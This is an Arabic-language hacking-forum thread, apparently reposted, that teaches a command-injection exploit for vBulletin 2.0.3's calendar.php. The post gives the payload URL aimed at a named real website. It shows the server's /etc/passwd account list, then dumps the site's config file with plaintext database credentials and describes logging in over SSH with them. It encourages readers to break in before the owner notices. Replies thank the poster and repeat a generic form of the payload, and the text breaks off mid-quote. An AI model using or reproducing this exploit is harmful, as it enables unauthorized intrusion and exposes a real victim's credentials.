بسم الله الرحمن الرحيم

ممممممم مني عارف من فين ابدا اه اوكي طيب لقيت بداية :)

واحد يوم صديق عزيز لي طلب مني اعلمه ثغرة قلت بدل ما اعقده و اتعقد معاه اوريه ثغرة في سكربت بدل ثغرة في دايمون المهم قلبت مخي و افتكر ثغرة <من ايام زمان> في الفي بي نسخة 2.0.3 :\

الثغرة دي حلوة و اول ثغرة اطبقها بنجاح في حياتي ليها ذكريات يعني<زي اغنية جيني ان ذا بتل و لا مو يا فيصلسين :)> ايش حكاية الذكريات اليوم المهم خلينا في موضوعنا

الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل

فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على

vbulletin 2.0.3

طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

http://www.romulus2.com <عارف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

و طبقنا الثغرة بدا الشكل

http://www.romulus2.com/forum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=";echo%20'';%20echo%20`<command>%20`;die();echo"

و مكان <command> نحط الامر الي نبيه

فاول شي قلنا خلينا نعرف مين احنا فحطينا

whoami

و الي طلع
http://www.arabsg.com/file/1.gif

انا استبشرت خير على الاقل مني nobody

فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت

cat /etc/passwd مكان <command>

و طلع

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
gtd:x:501:100::/home/gtd:/bin/bash
majordomo:x:504:103::/home/majordomo:/bin/bash
quota25:*:505:1::/home/quota25:
quota50:*:506:1::/home/quota50:
quota75:*:507:1::/home/quota75:
quota100:*:508:1::/home/quota100:
quota150:*:509:1::/home/quota150:
quota300:*:510:1::/home/quota300:
quota2:*:511:1::/home/quota2:
quota5:*:512:1::/home/quota5:
quota10:*:513:1::/home/quota10:
msql:x:497:100::/home/msql:/bin/bash
userquota:x:503:100:quota:/home/userquota:/bin/bash
johnv:*:516:1::/home/johnv:
minerva:x:514:516::/home/minerva:/bin/bash
taosfineart:x:517:517::/home/taosfineart:/bin/bash
technoasylum:x:518:518::/home/technoasylum:/bin/bash
ward-tech:x:519:519::/home/ward-tech:/bin/bash
malio:x:522:522::/home/malio:/bin/bash
cindyland:x:529:529::/home/cindyland:/bin/bash
mathom-house:x:532:532::/home/mathom-house:/bin/bash
libertywebhosting:x:534:534::/home/libertywebhosting:/bin/bash
bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash
oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash
dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash
surfclassic:x:550:549::/home/surfclassic:/bin/bash
thomason-development:x:552:551::/home/thomason-development:/bin/bash
james:x:553:534::/home/james:/bin/emailonly
alexr:x:554:534::/home/alexr:/bin/emailonly
god:x:555:522::/home/god:/bin/emailonly
sales:x:556:522::/home/sales:/bin/bash
info:x:557:522::/home/info:/bin/emailonly
ryugen:x:558:552::/home/ryugen:/bin/bash
allanart:x:566:559::/home/allanart:/bin/bash
womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash
mbaentry:x:576:567::/home/mbaentry:/bin/bash
omahasoaring:x:577:568::/home/omahasoaring:/bin/bash
talvee:x:582:549::/home/talvee:/bin/emailonly
mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash
mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash
ocdeaf:x:591:578::/home/ocdeaf:/bin/bash
foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash
finchair:x:594:580::/home/finchair:/bin/bash
americanabatement:x:595:581::/home/americanabatement:/bin/bash
whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash
ronemous:x:604:568::/home/ronemous:/bin/emailonly
parrotranch:x:605:588::/home/parrotranch:/bin/bash
erlefamily:x:606:589::/home/erlefamily:/bin/ftponly
parduhn:x:610:593::/home/parduhn:/bin/bash
riptideproductions:x:616:596::/home/riptideproductions:/bin/bash
kaialece:x:626:604::/home/kaialece:/bin/bash
zeeksystems:x:627:605::/home/zeeksystems:/bin/bash
trevor:x:630:596::/home/trevor:/bin/emailonly
dino:x:631:522::/home/dino:/bin/emailonly
loconsigo:x:632:608::/home/loconsigo:/bin/bash
delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash
michael:x:652:605::/home/michael:/bin/emailonly
jereme:x:654:596::/home/jereme:/bin/emailonly
windows-tips:x:655:624::/home/windows-tips:/bin/bash
ghost-ride:x:657:626::/home/ghost-ride:/bin/bash
cprltd:x:663:629::/home/cprltd:/bin/bash
batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash
housegroove:x:674:637::/home/housegroove:/bin/bash
washglass:x:675:638::/home/washglass:/bin/bash
djmattson:x:676:639::/home/djmattson:/bin/bash
statecapitols:x:677:640::/home/statecapitols:/bin/bash
kanjiweb:x:678:641::/home/kanjiweb:/bin/bash
freevg:x:681:644::/home/freevg:/bin/bash
writersresource:x:682:645::/home/writersresource:/bin/bash
evilgraphics:x:684:647::/home/evilgraphics:/bin/bash
magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash
antioch:x:704:659::/home/antioch:/bin/bash
lifelinks:x:705:660::/home/lifelinks:/bin/bash
sinecos:x:707:662::/home/sinecos:/bin/bash
dosdonas:x:711:666::/home/dosdonas:/bin/bash
accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash
jc:x:716:581::/home/jc:/bin/emailonly
jo:x:717:581::/home/jo:/bin/emailonly
infoaai:x:719:581::/home/infoaai:/bin/emailonly
gypsytejas:x:721:671::/home/gypsytejas:/bin/bash
j-j-c:x:724:674::/home/j-j-c:/bin/bash
camp:x:726:660::/home/camp:/bin/emailonly
marinabaypark:x:740:677::/home/marinabaypark:/bin/bash
gypsy:x:741:671::/home/gypsy:/bin/emailonly
meg:x:749:593::/home/meg:/bin/emailonly
huwe:x:751:679::/home/huwe:/bin/bash
ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash
socceracademypa:x:755:683::/home/socceracademypa:/bin/bash
phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash
videoteacher:x:762:690::/home/videoteacher:/bin/bash
spiffydesign:x:765:693::/home/spiffydesign:/bin/bash
nawaf:x:766:694::/home/nawaf:/bin/bash
ccdump:x:768:696::/home/ccdump:/bin/bash
drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash
showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash
shellmandanceacademy:x:778:706::/home/shellmandanceacademy:/bin/bash
samelec:x:779:707::/home/samelec:/bin/bash
pet-odor:x:780:708::/home/pet-odor:/bin/bash
michael1:x:781:593::/home/michael1:/bin/emailonly
mmnursereview:x:785:710::/home/mmnursereview:/bin/bash
franksland:x:787:712::/home/franksland:/bin/bash
gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash
globalintercultural:x:806:718::/home/globalintercultural:/bin/bash
gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash
francisengineering:x:808:720::/home/francisengineering:/bin/bash
befree2:x:814:726::/home/befree2:/bin/bash
barclay:x:821:689::/home/barclay:/bin/emailonly
airupdate:x:823:732::/home/airupdate:/bin/bash
stream:x:825:734::/home/stream:/bin/bash
strantech:x:826:735::/home/strantech:/bin/bash
newcityftp:x:832:740::/home/newcityftp:/bin/bash
nagomifan:x:833:741::/home/nagomifan:/bin/bash
gecko:x:834:671::/home/gecko:/bin/emailonly
chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash
binarytech:x:839:746::/home/binarytech:/bin/bash
<<<طبعا ملف الباس مره طويل لكن حطيته جزء منه عشان تشوفوه>>>>

ممم سيرفر جيد ;) و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع ايش حكايته

romulus2:x:997:837::/home/romulus2:/bin/bash
اووووه حركات يوصل ل /bin/bash

االمهم فكرت كيف حناخد الباسوورد حق دا الموقع صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان<ايام جني ان ذا باتل :)> كان يظهر

فقلت خلاص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس

من ملف الباسوود لاحظت انه الملف هو

/home/romulus2

و في طريقة تانية انك تكتب pwd

كتبت و طلع

/home2/www/romulus2/forum

اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها

/admin/config.php

فصار الامر

cat /home2/www/romulus2/forum/admin/config.php

و الي طلع صفحة فاضية طبعا صاحبي ما صدق اتريق علي شوية فقلتله شوف السورس بعدين اتكلم و يا سبحان الله الكونفيق موجود في السورس :)

السبب لوجود <?

و الكونفيق كان

<?php

/////////////////////////////////////////////////////////////
// Please note that if you get any errors when connecting, //
// that you will need to email your host as we cannot tell //
// you what your specific values are supposed to be //
/////////////////////////////////////////////////////////////

// type of database running
// (only mysql is supported at the moment)
$dbservertype='mysql';

// hostname or ip of server
$servername='localhost';

// username and password to log onto db server
$dbusername='romulus2';
$dbpassword='1786';

// name of database
$dbname='vbforum';

// allow password viewing / editing in control panel
// 0 = not visible or editable
// 1 = not visible, but can be edited
// 2 = visible and can be edited
$pwdincp=2;

// technical email address - any error messages will be emailed here
$technicalemail='admin@romulus2.com';

// use persistant connections to the database
// 0 = don't use
// 1 = use
$usepconnect=1;

?>

فقلت خلينا نشوف لوحة التحكم و شبكنا على 2082 من الاكسبلورر

للاسف اتضح انه مهم مركبين لوحة تحكم؟؟؟؟؟

فعملت سكان سريع على البورتات لقيت انه بورت22 حق ssh

مفتوحففتحت بوتي عشان اشبك عليهم
http://www.arabsg.com/file/2.gif
الله يستر لا يكون احد هنا له معرفة شخصية بيا<مشهور بصورة انشتاين :)>

المهم الي نحطه بس الهوست نيم و البورت زي ما هو موضح و نكلك على اووووبيييين

فيطلعلنا
http://www.arabsg.com/file/3.gif
حطيت اليوزر و بعدها الباسوورد

و الي طلع
http://www.arabsg.com/file/4.gif
مبروك اخترقنا الموقع و صار عندنا شيل :)

طبعا بعد كدا ممكن ننفذ ثغرات داخلية عشان نسيطر على السيرفر كاملا ممكن عن طريق ثغرات من خلال الشل بملفات سي مثلا او عن طريقة من الطرق الي ذكرتها في درسي قبل الماضي

و ان شاء الله الدرس القادم سيتناول الثغرات اللوكال عن طريق ملفات السي
ان شاء الله تكونوا استفدتو و على فكرة انا ما قلت شي لصاحب السيرفر فالحقو قبل ما يكتشف شي و يغير الباسووردات :) طبقو عشان ترسخ المعلومة
و في النهاية اقلكم

باااي

الكاتب:silentneedle
http://www.arabsg.com

يعطيك العافيه

اخوي الغالي

ولاتحرمنا من المزيد

بااااااااياااااات

أهلا بيك أخوي MaxHak2000

اشكرك على هذه الثغرة بس بصراحة قعدت اقرأ وأنا أظن أن أنت صاحب الموضوع اتاريه الي كتبه واحد ثاني

للحين مو فاهم هذه قصة ولا ثغرة ؟؟:D

واعذرني بعد هذا قصتك والله قصة الكاتب ؟؟:D

تحياتي|4||4||4|

الموضوع كتبه صاحبي وانا نقلته لكم يا شباب

تشااااااااااااااااو|4|

هلا اخوي MakHak2000

اعذرني على سوالفي واشكرك على الموضوع الجميل

لكن الثغرة ما نجحت معي ممكن الكود مو زين ما ادري

تحياتي|4|

ثانكس معا اني ماني فاهم شي بس قصه حلوة

شرح جميييييل جدااااا ماكس الله يعطيك العافييية |4||4|

السلام عليكم

ممكن حبيبي maxhak2000 تضع الكود وأكون لك شاكر

وهل الموقع إذا صار مصاب بالثغره تطلع الصفحه بيضاء أو تصير بالشكل هذا ..

The Iron Throne > Calendar > 08-15-2001


تشاو

احد فهم شي .
انا اتحدى واحد يطبق هالطريقة..

احبااااااااااااااااااااااااااااااط |3|

ههههههههههه

مشكور يا مشرفنا العزيز

هلا شباب اعذروني مارديت عليكم وذلك لأنشغالي
اشكركم على الردود التشجيعيه

ثانيا الثغره هذي في بعض المنتديات عالجتها في نفس الأصدار يعني ماتمشي عليها
زي ماحصل مع اخونا N4jD

اما بالنسبة لك يا حبيبي المتمكن
http://www.example.com/vb/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60[command]%20%60;die();echo%22

استبدل [command] بالأمر المطلوب مثلا pwd

تشاااو|4|

وانا جالس لي ساعه امخمخ والعب على نفسي
مسوي فيها فاهم ووخر عني جايب لي كاس شاهي عشان افهم
وآخرته زيي زي الطوفه بفهم هالثغره :D

لكن ما عليه
يسلم قلبك اخوي MakHak2000 على الثغره
بس ممكن طلب
لو سمحت ابتسلف عقليتك يومين وارجعها لك ;)
مشاء الله عليك عيني عليك بارده اخوي :)

ثانكيووووووو ماكس على الموضوع :)

تحياتي لك :)

مشكور اخوي ماكس على الموضوع القيم والثغره شغاله ميه ميه

موجوده في موقع الاسوار

بس مغلقه

الف شكر لك

الف الف شكر :D

الأسوار:p

سحبنا على ابوه من زمان

ومشكور على الردود يا حبايب
تشاو

[QUOTE]كاتب الرسالة الأصلية : maxhak2000
[B]بسم الله الرحمن الرحيم

ممممممم مني عارف من فين ابدا اه اوكي طيب لقيت بداية :)

واحد يوم صديق عزيز لي طلب مني اعلمه ثغرة قلت بدل ما اعقده و اتعقد معاه اوريه ثغرة في سكربت بدل ثغرة في دايمون المهم قلبت مخي و افتكر ثغرة <من ايام زمان> في الفي بي نسخة 2.0.3 :\

الثغرة دي حلوة و اول ثغرة اطبقها بنجاح في حياتي ليها ذكريات يعني<زي اغنية جيني ان ذا بتل و لا مو يا فيصلسين :)> ايش حكاية الذكريات اليوم المهم خلينا في موضوعنا

الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل

فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على

vbulletin 2.0.3

طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

http://www.romulus2.com <عارف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

و طبقنا الثغرة بدا الشكل

http://www.romulus2.com/forum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=";echo%20'';%20echo%20`<command>%20`;die();echo"

و مكان <command> نحط الامر الي نبيه

فاول شي قلنا خلينا نعرف مين احنا فحطينا

whoami

و الي طلع
http://www.arabsg.com/file/1.gif

انا استبشرت خير على الاقل مني nobody

فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت

cat /etc/passwd مكان <command>

و طلع

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x